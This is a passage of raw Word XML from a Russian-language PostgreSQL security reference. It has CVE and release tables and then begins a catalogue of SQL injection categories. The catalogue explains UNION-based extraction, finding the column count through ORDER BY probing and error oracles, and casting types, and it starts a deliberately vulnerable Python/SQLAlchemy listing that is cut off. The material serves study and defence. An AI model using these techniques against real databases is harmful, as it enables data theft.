          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — USAGE, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CREATE, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — SELECT и т.д.); роль после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — кто выдал привилегию. Запись вида </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=UC/postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> означает «PUBLIC имеет USAGE и CREATE, выданные postgres» — на таком кластере CVE-2018-1058-class атаки работают.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2796CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Помимо этого изменения, search_path остаётся важным контекстом для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SECURITY DEFINER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> функций (см. 3.13.6) и для нескольких более узких CVE — CVE-2023-2454 с обходом через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>schema_element</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.13.2), CVE-2024-10976 с RLS bypass через подмену плана (3.17.1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD10A9E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>2.5 Изменения безопасности по релизам</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7191288F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Сводно, что каждая мажорная версия PG 14–17 принесла на поверхности атаки и в защитных механизмах. Эту таблицу удобно держать перед глазами при чтении категорий.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9479F" w14:paraId="31D5BFD7" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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8CDFBFE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Версия</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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1493DD4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Новое и релевантное для безопасности</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="7018B55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2D5C11" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PG 14 (2021)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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31E486" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Предопределённые роли </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pg_read_all_data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pg_write_all_data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pg_database_owner</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>. Multirange types (новая поверхность для type-casting tricks).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="29CE8C5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F150BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PG 15 (2022)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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B3ABB2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>REVOKE CREATE ON public FROM PUBLIC</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> по умолчанию для новых кластеров — закрывает CVE-2018-1058-class атаки. Введён </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>MERGE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (открыл свою поверхность — CVE-2023-39418). </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>security_invoker</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> для views.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="39ACFB1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EA42FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PG 16 (2023)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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18C0E5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Предопределённые роли </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pg_create_subscription</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pg_use_reserved_connections</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>. Логическая репликация для standby-серверов.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="55D5880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2887FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PG 17 (2024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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F562A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Предопределённая роль </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pg_maintain</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> и привилегия </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>MAINTAIN</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">. Event trigger </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ON LOGIN</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — новая поверхность для persistence через event-триггер.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BD0C178" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Минорные релизы за 2024–2025, закрывшие критичные SQLi-related CVE (полная хронология — раздел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9479F" w14:paraId="7B284AB4" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360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29B10A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Минор</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="57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1D9CA07" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Что закрыто</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5D89CBAB"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C6C543" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.1 / 16.5 / 15.9 / 14.14 / 13.17 (ноябрь 2024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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8A8E82" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2024-10976 (RLS bypass через subquery), CVE-2024-10977 (libpq MITM error msg), CVE-2024-10978 (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SET ROLE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> reset), CVE-2024-10979 (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>plperl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> env → RCE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="0E9FD5FA"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57530A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.3 / 16.7 / 15.11 / 14.16 / 13.19 (февраль 2025)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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195A08" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2025-1094 (psql + invalid UTF-8, CVSS 8.1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="16274C31"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08EF8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.5 / 16.9 / 15.13 / 14.18 / 13.21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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D98DF1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2025-4207 (GB18030 buffer over-read, DoS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="3CC388C8"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A2AE04" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.6 / 16.10 / 15.14 / 14.19 / 13.22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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FAD4D4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2025-8713 (optimizer stats обходят view ACL/RLS), CVE-2025-8715 (newline в object names → injection при restore)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5FFE7B50"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632A3D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>18.1 / 17.7 / 16.11 / 15.15 / 14.20 / 13.23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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5827DF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2025-12817 (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CREATE STATISTICS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> DoS через name squat)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40CD9C15" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Отдельный случай — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2024-4317</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (утечка через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats_ext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, закрыта в 16.3 / 15.7 / 14.12). Установка минор-патча не закрывает уязвимость автоматически — администратор должен вручную запустить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fix-CVE-2024-4317.sql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в каждой БД, включая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>template0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>template1</w:t>
      </w:r>
      <w:r>
        <w:t>. На managed-провайдерах это часто не делается, поэтому версия минора «patched» не равно «не уязвимо». Подробности — раздел 4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE99A50" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>3. Каталог категорий инъекций</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED1A9E1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 UNION-based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6F0D22" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.1.0 Обзор категории</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B579683" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PostgreSQL требует точного совпадения числа колонок и совместимости типов в обеих частях </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это определяет всю механику паттерна. Перед извлечением данных атакующий обнаруживает число колонок (через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или nullable-пробинг) и подгоняет типы кастами </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. После этого UNION становится универсальным каналом извлечения произвольных данных, в том числе метаданных из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A35EC2B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Типичные точки входа: числовые ID в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:t>, IN-списки идентификаторов, любые места, где user input склеивается в SELECT-запрос без параметризации. Канал требует, чтобы результат UNION-а возвращался в HTTP-ответ — это не blind-техника, утечка идёт напрямую через тот же путь, по которому приложение отдаёт легитимные данные.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B1F985" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Категория состоит из четырёх подразделов: два подготовительных (определение числа колонок и типов), один по самой типичной точке входа (IN-список) и один по конечной цели — извлечению метаданных. Дальше канал может расширяться в любые таблицы, к которым у application-роли есть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BE6398" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.1.1 Определение числа колонок</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FF96DC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Перед извлечением данных через UNION нужно знать арность исходного SELECT. PG-сервер возвращает ошибку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>each UNION query must have the same number of columns</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> при несовпадении — это служит бинарным oracle для атакующего.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4B4B30" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C906566" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># api/views.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8EE8B9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6782E5FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BDDA27" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@app.get("/products")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4566C955" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
